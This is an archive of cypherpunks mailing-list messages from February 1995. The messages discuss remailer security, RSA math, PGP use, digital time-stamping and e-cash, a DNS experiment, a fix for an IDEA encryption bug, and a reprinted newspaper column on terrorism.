> phi(n)=(p-1)(q-1).  (Actually you want to use (p-1)(q-1)/gcd((p-1),(q-1)).
> I forget what that is called.)

"Least common multiple," or LAMBDA(n).


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Technoshaman Tom <tedwards@wam.umd.edu>
Date: Fri, 3 Feb 95 11:17:35 PST
To: cypherpunks@toad.com
Subject: Mugshot Identification Database announcement
Message-ID: <Pine.ULT.3.91.950203140756.10904D-100000@rac5.wam.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


Heard elsewhere...

                 National Institute of Standards and Technology

                           announces the release of
                           NIST Special Database 18

                    Mugshot Identification Database (MID)

NIST Special Database 18 is being distributed for use in development and
testing of automated mugshot identification systems. The database consists
of three CD-ROMs, containing a total of 3248 images of variable size,
compressed with lossless compression. Each CD-ROM requires approximately
530 megabytes of storage compressed and 1.2 gigabytes uncompressed
(2.2 : 1 average compression ratio). There are images of 1573 individuals
(cases), 1495 male and 78 female. The database contains both front and
side (profile) views when available. Separating front views and profiles, 
there are 131 cases with two or more front views and 1418 with only one
front view. Profiles have 89 cases with two or more profiles and 1268 with
only one profile. Cases with both fronts and profiles have 89 cases with
two or more of both fronts and profiles, 27 with two or more fronts and
one profile, and 1217 with only one front and one profile. Decompression
software, which was written in C on a SUN workstation [1], is included
with the database.

NIST Special Database 18 has the following features:

	+  3248 segmented 8-bit gray scale mugshot images (varying sizes)
           of 1573 individuals
	+  1333 cases with both front and profile views (see statistics above)
	+  131 cases with two or more front views and 89 cases with two or
           more profiles
	+  images scanned at 19.7 pixels per mm
	+  image format documentation and example software is included

Suitable for automated mugshot identification research, the database can be used for:

	+  algorithm development
	+  system training and testing

The system requirements are a CD-ROM drive with software to read ISO-9660
format and the ability to compile the C source code written on a SUN
workstation [1].

Cost of the database: $750.00.

For ordering information contact:

                            Standard Reference Data
                National Institute of Standards and Technology
                            Building 221, Room A323
                            Gaithersburg, MD 20899
                             Voice: (301) 975-2208
                             FAX:   (301) 926-0416
                          email: srdata@enh.nist.gov

All other questions contact:
                            Craig Watson
		       craig@magi.ncsl.nist.gov
			    (301)975-4402


[1]  The SUN workstation is identified in order to adequately specify or
     describe the subject matter of this announcement. In no case does
     such identification imply recommendation or endorsement by the
     National Institute of Standards and Technology, nor does it imply
     that the equipment is necessarily the best available for the purpose.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 3 Feb 95 11:42:44 PST
To: cypherpunks@toad.com
Subject: Re: Compromising the first remailer
Message-ID: <ab58386301021004942b@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:11 PM 02/03/95, rishab@dxm.ernet.in wrote:
>Actually any remailer, with NSA-modified operating software, can correlate the
>message it receives to the one it sends out, by keeping track of the message
>past any decryption until it's posted out. With rational use of garbage and
>chaining, all you do is stop the NSA from knowing your final destination from
>the first remailer, but they _would_ know the identity of the second remailer
>(assuming the first is compromised) and could try to attack the second, ad
>nauseum. Of course this was always known to be the problem, to which chaining
>and traffic analysis evasion are partial solutions.

Yes, but as long as _one_ remailer in your chain is not compromised by the
NSA, and if that one remailer has high enough traffic going through it and
does the proper things with reordering and latency and such (a big "if",
currently), you're still safe.

That turns out to be the whole purpose of chaining, since it has been shown
that it doesn't neccesarily make traffic analysis any harder.  The purpose
is to hope that at least one link on your chain is both honest and properly
working.  Yeah, if all the links on your chain are NSA-sponsored, your in
trouble.  Nothing that can be done about that.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Fri, 3 Feb 95 15:16:13 PST
To: cypherpunks@toad.com
Subject: Re: VoicePGP cracked in 10 minutes?...
Message-ID: <9502032249.AA04577@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > I heard a rumor hear in Ctl. Tx. that the VoicePGP project was cracked in the
> > last couple of days in approx. 10 minutes. Anyone have any info on this other
> > than one of those wild rumors that occur?
> 
> Considering that VoicePGP hasn't even been released, this is
> fascinating news. Perhaps the same team could work next on cracking
> things that haven't even been invented yet.

Cracking VoicePGP is easy, since it's still a bones version without
the encryption installed yet - anybody who can figure out where
to get the software should be able to do it.  Might take more than
10 minutes to do that :-)

However, the rumor mostly sounded like a pro-active version of the
"NSA cracked PGP" version of the FBI Modem Tax on Religious Broadcasting
put out by Madeline Murray O'Shergold.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 3 Feb 95 15:14:54 PST
To: remailer-operators@c2.org
Subject: Re: MX'ing and jpunix.com
In-Reply-To: <199502022127.PAA14199@jpunix.com>
Message-ID: <199502032312.PAA15531@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "John A. Perry" <perry@jpunix.com>

	   Additional masking can be provided by having the MX record point
   to myriad.pc.cc.cmu.edu. What good does this do? I have an agreement with
   myriad.pc.cc.cmu.edu (Matt Ghio) where myriad will take the MX-pointed
   record and additionally alias it through the smail daemon on myriad. 

This is the beginning of private name service.  The machines behind
this MX record are not particularly visible to the outside.  Given the
existence of such machine, it makes sense to consider giving them
names which are also not too visible from the outside.

A group of remailer operators who had access to the DNS setups on
their machines could create their own personal top-level domain.  For
sake of discussion, let's call it ".cp".  Now random Unix boxes on the
Internet won't be able to gain access to .cp addresses, but the
remailer club would.  Outside parties would be able to be shown .cp
addresses but would not be able to resolve where the machines actually
were on the Internet, much less find them IRL.  (Access control on who
can pull .cp records will have to be added the the DNS software in
order to do this.)

Consider this in the light of Matt Ghio's MX service.  Matt MX's for
the alias.net addresses.  Inside alias.net, the individual remailers
could use .cp addresses to talk to each other.  In fact, those who
want zero contact with the outside world could advertise only .cp
addresses and mail only to other .cp addresses.

For sake of experimentation, I've set up a primary top-level
nameserver here on my machine for ".cp".  In order to access it,
you'll need to act as a secondary name server for the domain.  Hacking
alternate roots into BIND comes later.  Just add the following line to
your named.boot file:

    secondary       cp      204.94.187.1    db-secondary.cp

If you do this, you'll be able to ask for a second-level domain.
If you want a .cp domain, send mail to

    hostmaster@ndip.cp

Tell the kind hostmaster what name you want, what you want it for,
where you name servers are, etc.  This is an experimental service and
is not guaranteed to be reliable.  It might also serve as a test bed
for doing cryptographic name service trials.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Fri, 3 Feb 95 15:24:04 PST
To: skaplin@mirage.skypoint.com
Subject: Re:  Is the remailer crisis over?
Message-ID: <9502032313.AA04793@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> Well folks as of 11:30 on 1-30-94 there are 14 remailers with uptimes
> greater than 99%. What's the consensus...Is the remailer crisis over?

The "remailers are broken" crisis may be over, but until there
are a lot of remailers in service, and 14 isn't a lot,
with a lot of traffic on them, remailers won't be a very effective
security tool.  

If the Bad Guys wanted to watch all 14 remailers,
it'd probably not be hard to figure out which messages came from
which senders, just because there aren't enough for real tracking.
If the Bad Guys decided to confiscate 14 remailers, they could do it.
If your machine got busted or sued for sending an anonymous message somebody
didn't like, and you contended that you're a remailer and there was
no way to prove it originated on your machine, "they" could respond that
you're not one of the 14 well-known remailers and if you were "they"
would have been watching you because they watch every machine that
talks to the well-known remailers, and you're not one of them.

As the folks in the nuclear-war planning business say, fewer than
100 of anything isn't reliable.  

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Fri, 3 Feb 95 19:58:31 PST
To: hkhenson@cup.portal.com
Subject: Re:  commercial authecation
Message-ID: <9502032329.AA04966@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Keith Henson asked how to find the digital-time-stamp folks,
Surety Technologies Inc., started by Stuart Haber and Scott Stornetta 
as a spinoff of Bellcore.

They're now actively in business - there was an article in one of the 
trade rags that you can get their signature kit for PCs for
something like $50 with tokens for 50 notarizations.
Details on their web page.

email: info@surety.com  
www: http://surety.com  - with lots of little graphic icons :-(
ftp: surety.com 

			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@telecheck.com>
Date: Fri, 3 Feb 95 13:42:54 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: re to hfinney
In-Reply-To: <199502031941.LAA18023@jobe.shell.portal.com>
Message-ID: <9502032142.AA17527@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text


> 
> hal sez:
> 
> : Perl does exist for ms-dos, and I think those scripts would probably work
> : OK there.  They don't do anything exotic, just some byte reads and
> : writes.  Maybe the random-number generation would need to be looked at;
> : as I said, that is the one weak part. But probably they would work OK.
> 
> kool . could you please repost the scripts , i seem to have misplaced them.
> also , where can i get perl for dos , any idea ? tia .
> 
> 

PERL can be obtained via anon FTP:

 ftp.uu.net			137.39.1.9
 archive.cis.ohio-state.edu  	128.146.8.52
 jpl-devvax.jpl.nasa.gov  	128.149.1.43

Get the source code and start compiling... :>

-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654	(800) 888-4922  *   (713) 439-6597
Finger for PGP KEY.  MicroSoft SNA Server SUCKS.. buy it at your own risk.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rchcnslt@epix.net
Date: Fri, 3 Feb 95 16:11:52 PST
To: cypherpunks@toad.com
Subject: AIR Mosaic Feedback Mail
Message-ID: <199502040009.AA26622@relay.interserv.com>
MIME-Version: 1.0
Content-Type: text/plain


Mail sent from AIR Mosaic (16-bit) version 3.07.04.02 

howdy..
Cyperpuk, life and all that..

Lemme in on the cool poop!

Rick R.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Feb 95 13:12:51 PST
To: cypherpunks@toad.com
Subject: NYT on Jihad
Message-ID: <199502032112.QAA08358@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



   The New York Times
   February 3, 1995, p. A19


   [Column] On My Mind


   A. M. Rosenthal


   Jihad in America


   The Clinton Administration has come to two major
   conclusions about terrorism in America, and from America.


   The first is that the United States is becoming a
   national safe haven for terrorists from the Middle East:
   a combination bank, fund-raiser, militarist training
   ground, recruitment center, political academy and
   embarkation dock.


   Second conclusion: Do something. So one recent night,
   instructions from Washington went out to banks nationwide
   to freeze the funds of the various Hamas Hezbollah and
   Islamic Jihad units, and their clones, operating from the
   East Coast to Texas and California. Mr. Clinton did that
   by Presidential order.


   Now the Administration is asking Congress to pass new
   anti-terrorist legislation. It would enable the
   Government to trace funds to and from the
   terrorist-supporting groups, tighten the definition of
   terrorism, enlarge the powers of Federal attorneys to
   deal with it and make it illegal to plan or train for
   terrorism abroad as well as in the U.S.


   The draft legislation is called the Omnibus
   Counterterrorism Act of 1995. It was drawn up by the
   Department of Justice on Presidential order and will be
   introduced in Congress in a matter of days.


   For Americans who have been warning about terrorism
   operating in and out of America, the time to relax has
   hardly arrived. We will see how effective it is in ending
   the contribution to terrorism of American laws and
   American inattention.


   But the fact is that the Clinton Administration has begun
   to pay more attention to the growth of terrorist
   organizations here than its predecessors have. And in
   parts of the government intelligence machinery, the
   assessment of the danger of terrorism originating in
   America is strong enough to surprise even anti-terrorism
   alarm ringers like myself.


   In large part, the awakening can be credited to the
   terrorists themselves. Even for America, blowing up the
   World Trade Center was a little thick.


   But the next time you get all worked up about the
   dastardly press, do remember that in the matter of
   terrorism, as so many others, it was an American
   journalist whose skill, determination and risk-taking
   (physical and professional) helped shake government
   awake.


   On Nov. 21, 1994, PBS presented "Jihad in America." The
   documentary laid it all out on film -- the meetings in
   American cities where the cry of holy war went up against
   America, Christians, Jews and Muslims who would not
   surrender to fundamentalism; the training; the visits to
   American units by Middle Eastern leaders of Hamas and
   Islamic Jihad, and the fund-raising structure that
   supported terrorism.


   The executive producer was Steven Emerson, an
   investigator of terrorism who has turned out a strong
   body of work in film, books and print journalism. Among
   government officials I talked to, credit for Mr. Emerson
   was not only acknowledged but volunteered.


   Democracy often has a tough time defending itself because
   it has to operate step by step, inch by inch, under the
   law. Yes, of course, that is democracy's blessing and
   strength.


   But nothing says a democracy has to watch the bombers
   come racing in their trucks and pretend they are
   bicyclists out for a ride in the park. Laurie Mylroie,
   the U.S. expert on Iraq who wrote a fine best seller on
   Saddam Hussein with Judith Miller, has written another
   book, focusing on the question of an Iraqi role in the
   bombing. It deserves to be published wide and soon.


   The Emerson documentary brought protests from American
   Muslim groups. So will the new legislation. Immediately,
   non-Muslims nod sypathetically and think, well, it's
   understandable Muslims will be upset. I almost did
   myself. But why? Christians are not expected to complain
   about denunciation of Christian Fascists. Jews around the
   world led the protests of the massacre at the mosque in
   Hebron and Jews generally did not protest the President's
   freezing of funds of two extremist Jewish groups.


   The assumption that all Muslims must be angry at action
   against Muslim terrorists strengthens the killers. It
   demeans the intelligence of all Muslims. And, as for the
   hundreds of thousands of Muslim victims who died under
   Muslim state tyranny or Muslim state-supported terrorism,
   it spits on their graves.


   END





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Fri, 3 Feb 95 14:00:10 PST
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: The FIREWALL CHIP. U're phone always offhook?
In-Reply-To: <Pine.SUN.3.91.950203103828.3246E-100000@crl.crl.com>
Message-ID: <199502032159.QAA12943@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


From a couple of folx....

> > Actually, there is a germ of truth in this.  On older phones (don't know if 
> > this works on newer electronic phones) when the handset is 'on-hook' a 
> > switch opens and breaks the voice circuit.  This of course only works for 
> > DC circuits.  If you drive that same circuit with an AC signal . . .
> 
> There's another angle I may have mentioned before.  Many 
> electronic phones come with a ``feature'' that allows you to 
> call home, produce an electronic tone and eavesdrop on your own
> house.  When the tone is sounded, the ringing stops (or never
> starts) and the phone goes into ``off hook'' mode (i.e., the
> microphone in the mouthpiece is turned on).
> 
[ Snip! ]

A simpler solution is to keep the phone in another room used mainly for
phonecalls, or even in a small office if you don't make an sounds there
worth evesdropping on. (The really paranoid can soundproof/tempest-proof
the room....)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 3 Feb 95 18:45:45 PST
To: cypherpunks@toad.com
Subject: Re:  re to hfinney
Message-ID: <199502040245.SAA05320@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: anonymous-remailer@shell.portal.com
> kool . could you please repost the scripts , i seem to have misplaced them.
> also , where can i get perl for dos , any idea ? tia .

Rather than re-post them, I put a copy of my message up for ftp at the
cypherpunks ftp site.  <URL:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/incoming/pgppad.scr >




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimp@wired.com (Jim Petersen)
Date: Tue Sep 07 12:49:18 1999
To: werewolf@io.org (Mark Terka)
Subject: Re: Why Doesn't Wired.....
In-Reply-To: <v4cAlOwscUg6077yn@io.org>
Message-ID: <4d08848dffcdbd0f7a5839bb1547e3d4@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <v4cAlOwscUg6077yn@io.org>, werewolf@io.org (Mark Terka) wrote:

> .....if it is sooooooo hooked in the online culture have a PGP public key
> that 'net users could use to send in their credit card numbers for
> subscriptions?


Here it is. We're just implementing it. Send us a message (send to
talk2subs@wired.com)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7

mQCOAy8EM1EAAAEEANqhOZTAwWI/99ZZ7t77VHH02n+xM4CQEk2DJe2zZhpjKP8v
EHndzBPr3dIsHOZUJABi7ztk5NiQhNVR5EBE7Tqz/7HhGFUE2ErVjAS3OQckcmvW
BrCgNXfe0G4tlX1paXFGHsoVT3UgE2IKjttwmZA1WtOH1lbgLCGi/5f257vHAA9A
AbQnV2lyZWQgQ2lyY3VsYXRpb24gPHRhbGsyc3Vic0B3aXJlZC5jb20+
=xdqc
-----END PGP PUBLIC KEY BLOCK-----

-- 
Jim Petersen                         Argue for your limitations....
jimp@wired.com                           And they are yours.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Fri, 3 Feb 95 21:09:35 PST
To: cypherpunks@toad.com
Subject: Wired Institutes PGP Usage For Subscriptions....
Message-ID: <8ajClOwscU-H077yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


Got this message in my mailbox a week after I posted the query of magazine
subscriptions via encrypted cc #'s. I'll check it out tonight, as I want to
order a subscription for a friend.
===========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Fri, 3 Feb 95 21:59:13 PST
To: wcs@anchor.ho.att.com
Subject: Re:  commercial authecation
Message-ID: <199502040558.AA15052@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Keith Henson asked how to find the digital-time-stamp folks,
> Surety Technologies Inc., started by Stuart Haber and Scott Stornetta 
> as a spinoff of Bellcore.
> 
> They're now actively in business - there was an article in one of the 
> trade rags that you can get their signature kit for PCs for
> something like $50 with tokens for 50 notarizations.
> Details on their web page.

This technology is very clever and bound to be extremely important.  
But does anyone else think that the price is a little high?  I mean 
the marginal cost can't be more than a few seconds of CPU time for 
each time stamp...

This price tag will temporarily put the time stamp technology out of 
ubiquitous use, where every piece of e-mail, homework paper, Usenet 
post, etc., is automaticly time stamped in a cryptographically secure 
way so that authorship can be asserted and proved.  I think the 
need for proof of authorship is going to become increasingly important 
in an increasingly online world, where copying is so effortless, and 
reputations are based on digital identities.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzMXKDl0sXKgdnV5AQFA+gP/XcrjAncBMVqocpXYfAaBR7RJ2PDR4ZF/
TEgCPcPM7we4eoR5w++7V+jsBhtNRSng5OUCeKQWSCU8BDnkUXuQNpQ8+fNKciMS
RQWn1PBx4carczVOJoNyR1U8Rxu9tIH0Drh/NIZJ4324azpMOd8ysVFkJ4QODCPu
07Bf7pZ36c0=
=tAcu
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 3 Feb 95 09:56:58 PST
To: cypherpunks@toad.com
Subject: Compromising the first remailer
Message-ID: <gate.0gDZZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook wrote:
> >notion of not assigning trust is simply nonsense. When you send a piece
> >of mail to a remailer, encrypted or not, you are assigning complete
> >trust in that remailer to keep you anonymous and not to forward your
> >mail to the NSA immediately.
>  
> NOT TRUE.  With proper use of encryption, you are trusting your first
> remailer only to not reveal that you sent a message, and not to correlate
> that message to the one it sends out.  With rational use of garbage running
> two deep, you can even suffer this loss without significant harm.
 
Actually any remailer, with NSA-modified operating software, can correlate the
message it receives to the one it sends out, by keeping track of the message
past any decryption until it's posted out. With rational use of garbage and
chaining, all you do is stop the NSA from knowing your final destination from
the first remailer, but they _would_ know the identity of the second remailer
(assuming the first is compromised) and could try to attack the second, ad
nauseum. Of course this was always known to be the problem, to which chaining
and traffic analysis evasion are partial solutions.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 3 Feb 95 09:54:26 PST
To: cypherpunks@toad.com
Subject: Tribes, cyberspace and the communication society
Message-ID: <gate.eiDZZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


The Internet develops its own order...

Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#46, 30/January/1995: Tribes, cyberspace and the communication society

Industrialization brought with it many social changes.
Concentrating power in cities, it expanded the value of
property rights and built a complex formal legal system to
enforce them. It gave birth to the powerful police force
as the means for keeping law and order in the urban
population of gathered strangers, and, while spreading
democracy, distanced people from the process of
legislation that affected them. All this is going to
change as the information revolution engulfs the planet.
Perhaps surprisingly, the social changes to come will more
closely reflect humans as they interacted millennia ago,
rather than as they did in the more recent past.

Before industrialization, cities were much less important.
The village (in an idealized history) was the key social
unit, as the tribe was in pre-agricultural communities.
Economic power, being geographically distributed, resulted
in considerable control by people over the informal rules
that governed them and their immediate environment,
despite the absence of democracy as we now know it.
Property rights were lax, especially in tribal society;
villages placed great importance on common land. There was
correspondingly little emphasis on a police force or
formal law. Order was maintained primarily through systems
of social punishment - reputation and taboo.

As cities formed, the value of owned property increased,
as there was little sense of community or common benefit
among strangers. Crime increased, property rights became
important to enforce, and taboo was no longer an effective
preserver of order primarily because unlike villages, the
city is not what I call a communication society. People
don't depend on each other in cities as much as in
villages, nor does the threat of ostracization work, as
social interaction is a far greater component of rural
than urban life. Urban society needed, and developed,
modern forms of centralized law enforcement.

As mainstream media and the general public discover the
relative anarchy of the Internet, they take fright at its
apparent disorder and suggest the need for government if
cyberspace is to have a future - people fear freedom. At
least until they experience it - after all, the Net has
been around long before it became front-page news, and has
evolved its own, distributed, law. Based on principles of
total freedom of expression and a strong dislike of
irrelevant content outside clearly defined zones,
infractions are met sometimes by the guerrilla action of
spontaneous protest, sometimes by ostracization.

This works because cyberspace is also a communication
society. While McLuhan's Global Village has become
extremely cliched, in this aspect cyberspace does resemble
a village. People on the Net may not be dependent on each
other for food and clothing, but they are for almost
anything else concerned with a cyber life. Cyberspace is
full of vibrant communities that do little else but talk,
and with social interaction at a higher level than at any
time in history, it is well suited to a system of social
punishment such as taboo; indeed, this may become the only
practical form of wired justice, and could be very
effective - in cyberspace, if nobody talks to you, you're
dead.

The similarity to pre-industrial communities does not end
with modes of governance, but extends to basic issues of
economics. Property rights in the infosphere are
contentious; they keep getting more impractical to
enforce, and will play a diminished role in a post-
industrial world as technology and people work around
attempts at formal legislation. Without realizing it, the
denizens of the Net have already created a vast 'cooking-
pot' market in software, news and information, based on
the very tribal notion of shared property and benefit.
That government and industry will work with such
disorganized economies is extremely unlikely, but they are
so inherent to the communication society that cyberspace
is, that they will survive, though perhaps occasionally
going underground.

Technology and society go hand in hand, but sometimes
history repeats itself, if not without variation. Though
the realm of information forms but part of our lives, that
part will increase, and affect the rest. If we are a
communication society while in the ocean of information,
what might we be outside?

Rishab Aiyer Ghosh is a freelance technology consultant
and writer. You can reach him through voice mail (+91 11
3760335) or e-mail (rishab@dxm.ernet.in).
--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
 This article may be redistributed in electronic form only, PROVIDED 
 THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT 
 UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
 or redistributed in any form for compensation of any kind, WITHOUT 
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab@dxm.ernet.in)
--==================================================================--


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Fri, 3 Feb 95 22:11:13 PST
To: tjb@acpub.duke.edu
Subject: IMPORTANT: BUG IN 68K IDEA ASSEMBLER DISTRIBUTED IN SECURE EDIT
Message-ID: <v01510102ab58c9039fd6@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


IMPORTANT NOTE:

If you are going to use the IDEA 68k assembler distributed with Secure Edit
b0.5, please take note of the following bug:

You have to change

@Mulzero3:
        neg.w   d7 <---
        addq.w  #1,d5
        sub.w   -2(a1),d5
        bra.s   @Muldone3

to:

@Mulzero3:
        neg.w   d5 <---
        addq.w  #1,d5
        sub.w   -2(a1),d5
        bra.s   @Muldone3


I have not yet received any reports of data being fouled up by this, and
before tonight personally had encrypted and decrypted megabytes without
error, but note that I HAVE FOUND EXAMPLES OF IT FOULING UP A BLOCK OF
DATA. IT IS DANGEROUS TO USE THIS CODE IN ITS PRESENT FORM. Please make
note of this if you are going to use this 68k code.

Currently, I do not believe this code is being used anywhere except Secure
Edit b0.5, although it was certainly about to be used. I will immediately
upload a corrected version of Secure Edit and source.

Sorry about the screw up.

Tom



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzMbp1uwJA7oL8O9AQGk0wP/YF8VQ2jDtW63Wb7fteImBvYCfMi7NnTf
tXMBV6U5iIKf+iBoED34gnwJyLAdEplpMa6P1yJUIMjNXly1/I+SzQoMFGVXuuKV
m0h+idXI1mXTVG+gnmdpGMw9/6/u72DcaYCZRHveL8tuMesO5UdgQEDjvy+zX7+c
0cAvyXQaArg=
=ubXB
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Sat, 4 Feb 95 00:01:00 PST
To: tjb@acpub.duke.edu
Subject: FIXED SEC. EDIT, SEC. EDIT SOURCE, UPGRADE PATCH
Message-ID: <v0151010aab58e5d06317@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


I have uploaded a fixed version of both secure edit and source code to
ripem.msu.edu in the directory pub/crypt/mac.

I have also uploaded a 35k patch that will update your b0.5 to b0.6.

There are also some other minor bugfixes rolled into this b0.6 update.

Again, sincere apologies for the bug (it was my fault), and I earnestly
hope no data was compromised by it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzMx/1uwJA7oL8O9AQHHegP9FPCkO2fVO54Vm3kDTsJH+1SW5Iui3wTS
F4BvZ0CSzJTw8K15oYOVnVbYcqofoOe5DvmR4ex1kK7zPObicfwLeIQbcvnRbBuI
0xpk+ymOMgOzjd9ySusXNuTCuwomQHXD4jTuyEsU+QrT6FEkmUJjA+TtctAZu7JX
nbZGDtOD/18=
=xKnR
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Sat, 4 Feb 95 02:22:46 PST
To: cypherpunks@toad.com
Subject: <none specified>
Message-ID: <199502041019.FAA17058@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I wonder if 'Net-cash' is any good?  Try sending e-mail to
netbank-info@agents.com
with the words netbank-intro on the first line of body.

It says:

        The NetBank ...is based on "payment coupons" that may be traded
        via electronic mail ... NetCash is easily obtained by using the
        NetBank's "Check Cashing by FAX" service.  Customers may
        purchase NetCash by writing a personal check and faxing it to
        the NetCash Distribution Center.  Travelers on the Infobahn may
        carry NetCash and cash checks while online.

and lots more. Does not look too anymous, however, and there is no
mention of PGP in the documents I got.  But do check it out.

When you get the info, they give you 5 cents worth of NetCash, BTW.
They also have other stuff:

        For information on related topics, please send e-mail to
        "netbank-info@agents.com" with the following keyword(s) in the
        message:

    Keyword                         Topic

  netbank-faq         Answers to frequently asked questions
  buying-netcash      How to buy NetCash from the NetBank
  netbank-merchant    Opening a NetBank Merchant account
  shareware-info      Using the NetBank to collect shareware fees
  boardwatch-story    Reprint of NetCash story from Boardwatch Magazine
  story-update        Enhancements since the Boardwatch story was published

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzNURyoZzwIn1bdtAQFwJwF+KeI9ErF2N04Y1+XwX4B6teBDlIudSuip
uNhn0k80uoru/vIWb//WMiMCBFHT+Bww
=39YD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Sat, 4 Feb 95 03:01:39 PST
To: werewolf@io.org (Mark Terka)
Subject: Re: Wired Institutes PGP Usage For Subscriptions....
In-Reply-To: <8ajClOwscU-H077yn@io.org>
Message-ID: <199502041101.GAA29832@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Got this message in my mailbox a week after I posted the query of magazine
> subscriptions via encrypted cc #'s. I'll check it out tonight, as I want to
> order a subscription for a friend.

[ clip ]

> In article <v4cAlOwscUg6077yn@io.org>, werewolf@io.org (Mark Terka) wrote:
> 
> > .....if it is sooooooo hooked in the online culture have a PGP public key
> > that 'net users could use to send in their credit card numbers for
> > subscriptions?
> 
> 
> Here it is. We're just implementing it. Send us a message (send to
